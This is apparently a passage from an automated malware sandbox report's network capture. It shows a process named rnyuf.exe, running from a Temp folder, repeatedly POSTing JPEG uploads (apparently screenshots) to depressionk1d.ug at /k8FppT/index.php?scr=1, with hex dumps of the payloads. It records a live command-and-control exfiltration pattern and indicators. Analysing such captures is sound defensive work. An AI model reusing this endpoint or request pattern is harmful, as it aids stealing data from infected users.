                                                                                                                                                                                Nov 11, 2021 12:26:53.620847940 CET20760OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN%ZbxcQUd!Ki8)VqE9j4lh-*OWUArU$MVpsOZ):e*SzpsO}PO
                                                                                                                                                                                Nov 11, 2021 12:26:53.620867014 CET20761OUTData Raw: 9f f0 45 be f0 e6 ad a6 d8 bd e5 dd b2 c7 0c 6e 91 c8 44 f1 b3 46 ec 09 0a ea 18 b2 b6 01 e0 80 47 7a ca 15 d1 6a 3a ce 9d a9 78 73 5e 96 2b 3f b0 ea 17 ba 85 ad c4 c8 f7 7e 67 9a d8 97 79 8d 76 82 a8 09 ce 3e 62 37 75 e9 5c ed 6d 46 a4 e7 75 35
                                                                                                                                                                                Data Ascii: EnDFGzj:xs^+?~gyv>b7u\mFu5k2pl@)(AGz)hRR(*QGz`-- )i)Z(N!E-7(!F)D>SE(5DSsFix4iDipDRR8SuR%PxZd4H<
                                                                                                                                                                                Nov 11, 2021 12:26:53.676521063 CET20816INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:53 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                26192.168.2.549808178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:26:57.447632074 CET20829OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----0b6edbf9bdab22be0590ffda9d2d8f20
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 85145
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:26:57.447736979 CET20829OUTData Raw: 2d 2d 2d 2d 2d 2d 30 62 36 65 64 62 66 39 62 64 61 62 32 32 62 65 30 35 39 30 66 66 64 61 39 64 32 64 38 66 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------0b6edbf9bdab22be0590ffda9d2d8f20Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:26:57.447927952 CET20839OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:26:57.448014975 CET20842OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:26:57.472903013 CET20845OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:26:57.472939968 CET20848OUTData Raw: 91 68 ef 49 45 30 17 34 a0 d3 69 68 4c 43 c3 53 d5 b9 a8 45 38 55 5c 96 89 b2 0d 05 41 a8 81 a5 04 d5 5c 56 1c 61 53 4c 36 fe 95 20 6a 70 6a 2c 98 af 24 56 30 b0 a6 94 23 b5 5d e0 d2 ec 53 4b 91 0f da 3e a6 79 14 a2 ae 98 54 d3 0d b7 71 4b d9 b2
                                                                                                                                                                                Data Ascii: hIE04ihLCSE8U\A\VaSL6 jpj,$V0#]SK>yTqK+b0M(.V)qF)bRKvR([P)qKiWb1L.7b1EqQ,#"TX.E.(.Q+S iZB#X9>Gmjqh;1I8ke'q(
                                                                                                                                                                                Nov 11, 2021 12:26:57.472969055 CET20856OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:26:57.472981930 CET20857OUTData Raw: 16 32 74 14 e8 37 68 cf 47 ea b6 22 26 ba 7f 06 4b 21 96 fe 02 4f 92 60 de 47 60 c0 8c 7f 33 54 0e 8f a7 cb fb db 7f 10 69 fe 47 5f df 39 47 03 fd da e8 34 3f b0 c3 63 24 7a 73 bc d1 b3 62 5b 96 5d be 69 1d 94 7f 74 7f 3a f6 33 bc d3 0b 1c 0c d5
                                                                                                                                                                                Data Ascii: 2t7hG"&K!O`G`3TiG_9G4?c$zsb[]it:3uk]FR4k-c+s{|]5\D1r^)b~gJ]JZ+_hJ--e1]j6w]f7W:Dq0w\+
                                                                                                                                                                                Nov 11, 2021 12:26:57.472991943 CET20861OUTData Raw: 0a 31 4e 02 9a 25 b0 a5 a3 14 a0 53 24 00 a7 52 01 4e 14 c4 c2 8c 53 b1 46 29 92 25 28 a4 a0 1a 00 75 2e 69 b4 50 21 d4 b9 a6 66 8c d0 16 24 cd 28 35 1e 69 73 40 ac 4a 0d 2e 6a 1c d2 83 4e e4 f2 91 df 9c db af fb df d0 d7 a2 68 16 eb ac 69 7e 0d
                                                                                                                                                                                Data Ascii: 1N%S$RNSF)%(u.iP!f$(5is@J.jNhi~iN7B^qxsz4/myPM2/wE5ZrG?mbP^^8+<9|&}W5rovUs5Ex#q'L34gs+|Eks_
                                                                                                                                                                                Nov 11, 2021 12:26:57.473067045 CET20868OUTData Raw: 9f f0 45 be f0 e6 ad a6 d8 bd e5 dd b2 c7 0c 6e 91 c8 44 f1 b3 46 ec 09 0a ea 18 b2 b6 01 e0 80 47 7a ca 15 d1 6a 3a ce 9d a9 78 73 5e 96 2b 3f b0 ea 17 ba 85 ad c4 c8 f7 7e 67 9a d8 97 79 8d 76 82 a8 09 ce 3e 62 37 75 e9 5c ed 6d 46 a4 e7 75 35
                                                                                                                                                                                Data Ascii: EnDFGzj:xs^+?~gyv>b7u\mFu5k2pl@)(AGz)hRR(*QGz`-- )i)Z(N!E-7(!F)D>SE(5DSsFix4iDipDRR8SuR%PxZd4H<
                                                                                                                                                                                Nov 11, 2021 12:26:57.498012066 CET20875OUTData Raw: 6f f1 d7 51 b5 b5 86 dd 34 4b 42 b1 22 a2 96 95 b2 40 18 e6 a4 ff 00 85 f9 aa 7f d0 12 cb fe fe bd 70 53 8d 7a 7f 0f 5f 4f c8 ed a8 e8 54 b7 37 4f 5f cc f4 c5 f0 64 97 93 a4 9a ee b3 75 a9 a4 67 2b 01 5f 2a 3c fb a8 27 3f a5 6e 6a ea b1 f8 7e fd
                                                                                                                                                                                Data Ascii: oQ4KB"@pSz_OT7O_dug+_*<'?nj~BH@a_@K/=NkgMFdlF?:*FO__m:0R$LQ(L@GzQLRQEffiE;R%JM%&4-/zJQ@04RQ@@Qi(=i6
                                                                                                                                                                                Nov 11, 2021 12:26:57.539340019 CET20917INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:57 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                27192.168.2.549814178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:26:58.647510052 CET20931OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----0b6edbf9bdab22be0590ffda9d2d8f20
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 85145
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:26:58.647629976 CET20931OUTData Raw: 2d 2d 2d 2d 2d 2d 30 62 36 65 64 62 66 39 62 64 61 62 32 32 62 65 30 35 39 30 66 66 64 61 39 64 32 64 38 66 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------0b6edbf9bdab22be0590ffda9d2d8f20Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:26:58.647800922 CET20941OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:26:58.647911072 CET20944OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:26:58.673002958 CET20952OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:26:58.673046112 CET20963OUTData Raw: 9e 59 4c ed ea ae 73 f3 0a e6 5a f2 ed ad ae ed bc d5 58 2e e5 59 a7 8d 63 55 0c eb bb 69 18 1f 28 1b db 81 81 cf d2 a6 7d 5b 52 92 7b a9 5a e5 4b 5d 5b 0b 59 57 ca 4d 86 21 b7 6a 85 c6 06 36 ae 30 01 04 64 73 4f d9 d4 e9 e5 ff 00 07 ef 77 f9 0b
                                                                                                                                                                                Data Ascii: YLsZX.YcUi(}[R{ZK][YWM!j60dsOwCvW^xum>#{Nnte!O-^2L1L&}FXA%#4nR#$1RN?-u/)Lrm_G60~ZKIX(,D^>GtrUiWz}:]e.
                                                                                                                                                                                Nov 11, 2021 12:26:58.673214912 CET20967OUTData Raw: 9f f0 45 be f0 e6 ad a6 d8 bd e5 dd b2 c7 0c 6e 91 c8 44 f1 b3 46 ec 09 0a ea 18 b2 b6 01 e0 80 47 7a ca 15 d1 6a 3a ce 9d a9 78 73 5e 96 2b 3f b0 ea 17 ba 85 ad c4 c8 f7 7e 67 9a d8 97 79 8d 76 82 a8 09 ce 3e 62 37 75 e9 5c ed 6d 46 a4 e7 75 35
                                                                                                                                                                                Data Ascii: EnDFGzj:xs^+?~gyv>b7u\mFu5k2pl@)(AGz)hRR(*QGz`-- )i)Z(N!E-7(!F)D>SE(5DSsFix4iDipDRR8SuR%PxZd4H<
                                                                                                                                                                                Nov 11, 2021 12:26:58.673230886 CET20970OUTData Raw: 35 96 54 92 53 7e 67 a5 99 dd d4 82 7d 8f 4f 8b 8f 87 76 7f 85 72 d2 e4 93 5d 52 a9 3f 0f ac 47 ae 2b 99 96 22 7d 73 46 0d ab cf d5 9c d9 ac 1b e5 b7 64 54 a2 9e 51 85 37 04 76 af 45 34 cf 05 c5 ad c4 a2 8a 29 88 5a 29 29 40 a0 07 a8 1d a9 e3 ef
                                                                                                                                                                                Data Ascii: 5TS~g}Ovr]R?G+"}sFdTQ7vE4)Z))@QIUp}6mOzRs<T3(1RhfJQc#ho SSGZp5r%Y9nSI{8=/frhwDj=jQ+kQygSaTe{
                                                                                                                                                                                Nov 11, 2021 12:26:58.698127985 CET20972OUTData Raw: 6f f1 d7 51 b5 b5 86 dd 34 4b 42 b1 22 a2 96 95 b2 40 18 e6 a4 ff 00 85 f9 aa 7f d0 12 cb fe fe bd 70 53 8d 7a 7f 0f 5f 4f c8 ed a8 e8 54 b7 37 4f 5f cc f4 c5 f0 64 97 93 a4 9a ee b3 75 a9 a4 67 2b 01 5f 2a 3c fb a8 27 3f a5 6e 6a ea b1 f8 7e fd
                                                                                                                                                                                Data Ascii: oQ4KB"@pSz_OT7O_dug+_*<'?nj~BH@a_@K/=NkgMFdlF?:*FO__m:0R$LQ(L@GzQLRQEffiE;R%JM%&4-/zJQ@04RQ@@Qi(=i6
                                                                                                                                                                                Nov 11, 2021 12:26:58.698169947 CET20978OUTData Raw: 44 7b 3e a9 c6 85 a4 ff 00 d7 11 fc ab 17 bd 6d ea dc 68 da 50 ff 00 a6 23 f9 0a c3 ae 5c 2f f0 fe f2 b1 ff 00 c6 fb 85 c5 2e 0d 26 69 73 5d 27 18 53 c5 32 94 1a 91 a2 4a 5a 68 34 bd e9 16 85 14 e1 4d cd 38 52 29 0e ed 4a 29 07 6a 78 a8 2d 0a 3a
                                                                                                                                                                                Data Ascii: D{>mhP#\/.&is]'S2JZh4M8R)J)jx-:fZx&xRD=i$iL4TsPPu68k~(m+^yW.>]_-kC3Z8yVL:SIy}dT{w.f>M()T[;xt+f{$
                                                                                                                                                                                Nov 11, 2021 12:26:58.698203087 CET20980OUTData Raw: fe 7b de ff 00 e0 31 ff 00 1a c6 86 2f 13 42 1c 90 5a 7a 17 5f 07 87 af 3e 79 bd 7d 4c 31 f0 b3 5d 1d 2e f4 f1 ff 00 6d 1f ff 00 88 ae b7 44 d0 2e fc 39 e0 9d 5e ce f2 48 5e 47 59 a5 06 16 24 60 c4 07 70 39 e0 d6 67 fc 2e bf 07 7f cf 6b df fc 06
                                                                                                                                                                                Data Ascii: {1/BZz_>y}L1].mD.9^H^GY$`p9g.k?U.<jZE|^&9&<=|^SF8h8f&;4bJM1Ki.$K`9TM3@XpKM@1Ew hAM"IC8T(N(-U
                                                                                                                                                                                Nov 11, 2021 12:26:58.727416039 CET21019INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:58 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                28192.168.2.549821178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:00.062808037 CET21037OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----4b59302975883e8abcc907d9abff9449
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 93805
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:00.063055038 CET21037OUTData Raw: 2d 2d 2d 2d 2d 2d 34 62 35 39 33 30 32 39 37 35 38 38 33 65 38 61 62 63 63 39 30 37 64 39 61 62 66 66 39 34 34 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------4b59302975883e8abcc907d9abff9449Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:00.063076019 CET21047OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:00.063173056 CET21050OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:00.088229895 CET21053OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:00.088311911 CET21058OUTData Raw: 91 68 ef 49 45 30 17 34 a0 d3 69 68 4c 43 c3 53 d5 b9 a8 45 38 55 5c 96 89 b2 0d 05 41 a8 81 a5 04 d5 5c 56 1c 61 53 4c 36 fe 95 20 6a 70 6a 2c 98 af 24 56 30 b0 a6 94 23 b5 5d e0 d2 ec 53 4b 91 0f da 3e a6 79 14 a2 ae 98 54 d3 0d b7 71 4b d9 b2
                                                                                                                                                                                Data Ascii: hIE04ihLCSE8U\A\VaSL6 jpj,$V0#]SK>yTqK+b0M(.V)qF)bRKvR([P)qKiWb1L.7b1EqQ,#"TX.E.(.Q+S iZB#X9>Gmjqh;1I8ke'q(
                                                                                                                                                                                Nov 11, 2021 12:27:00.088390112 CET21064OUTData Raw: 9e 59 4c ed ea ae 73 f3 0a e6 5a f2 ed ad ae ed bc d5 58 2e e5 59 a7 8d 63 55 0c eb bb 69 18 1f 28 1b db 81 81 cf d2 a6 7d 5b 52 92 7b a9 5a e5 4b 5d 5b 0b 59 57 ca 4d 86 21 b7 6a 85 c6 06 36 ae 30 01 04 64 73 4f d9 d4 e9 e5 ff 00 07 ef 77 f9 0b
                                                                                                                                                                                Data Ascii: YLsZX.YcUi(}[R{ZK][YWM!j60dsOwCvW^xum>#{Nnte!O-^2L1L&}FXA%#4nR#$1RN?-u/)Lrm_G60~ZKIX(,D^>GtrUiWz}:]e.
                                                                                                                                                                                Nov 11, 2021 12:27:00.088411093 CET21066OUTData Raw: 16 32 74 14 e8 37 68 cf 47 ea b6 22 26 ba 7f 06 4b 21 96 fe 02 4f 92 60 de 47 60 c0 8c 7f 33 54 0e 8f a7 cb fb db 7f 10 69 fe 47 5f df 39 47 03 fd da e8 34 3f b0 c3 63 24 7a 73 bc d1 b3 62 5b 96 5d be 69 1d 94 7f 74 7f 3a f6 33 bc d3 0b 1c 0c d5
                                                                                                                                                                                Data Ascii: 2t7hG"&K!O`G`3TiG_9G4?c$zsb[]it:3uk]FR4k-c+s{|]5\D1r^)b~gJ]JZ+_hJ--e1]j6w]f7W:Dq0w\+
                                                                                                                                                                                Nov 11, 2021 12:27:00.088443041 CET21069OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN%ZbxcQUd!Ki8)VqE9j4lh-*OWUArU$MVpsOZ):e*SzpsO}PO
                                                                                                                                                                                Nov 11, 2021 12:27:00.088473082 CET21073OUTData Raw: 9f f0 45 be f0 e6 ad a6 d8 bd e5 dd b2 c7 0c 6e 91 c8 44 f1 b3 46 ec 09 0a ea 18 b2 b6 01 e0 80 47 7a ca 15 d1 6a 3a ce 9d a9 78 73 5e 96 2b 3f b0 ea 17 ba 85 ad c4 c8 f7 7e 67 9a d8 97 79 8d 76 82 a8 09 ce 3e 62 37 75 e9 5c ed 6d 46 a4 e7 75 35
                                                                                                                                                                                Data Ascii: EnDFGzj:xs^+?~gyv>b7u\mFu5k2pl@)(AGz)hRR(*QGz`-- )i)Z(N!E-7(!F)D>SE(5DSsFix4iDipDRR8SuR%PxZd4H<
                                                                                                                                                                                Nov 11, 2021 12:27:00.088493109 CET21076OUTData Raw: 35 96 54 92 53 7e 67 a5 99 dd d4 82 7d 8f 4f 8b 8f 87 76 7f 85 72 d2 e4 93 5d 52 a9 3f 0f ac 47 ae 2b 99 96 22 7d 73 46 0d ab cf d5 9c d9 ac 1b e5 b7 64 54 a2 9e 51 85 37 04 76 af 45 34 cf 05 c5 ad c4 a2 8a 29 88 5a 29 29 40 a0 07 a8 1d a9 e3 ef
                                                                                                                                                                                Data Ascii: 5TS~g}Ovr]R?G+"}sFdTQ7vE4)Z))@QIUp}6mOzRs<T3(1RhfJQc#ho SSGZp5r%Y9nSI{8=/frhwDj=jQ+kQygSaTe{
                                                                                                                                                                                Nov 11, 2021 12:27:00.170277119 CET21134INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:00 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                29192.168.2.549828178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:01.332703114 CET21146OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----43b66a5b34034ef1ef30ea4a95cf35b0
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 94606
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:01.332783937 CET21147OUTData Raw: 2d 2d 2d 2d 2d 2d 34 33 62 36 36 61 35 62 33 34 30 33 34 65 66 31 65 66 33 30 65 61 34 61 39 35 63 66 33 35 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------43b66a5b34034ef1ef30ea4a95cf35b0Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:01.332978010 CET21157OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:01.333106041 CET21159OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:01.358114958 CET21166OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:01.358171940 CET21171OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
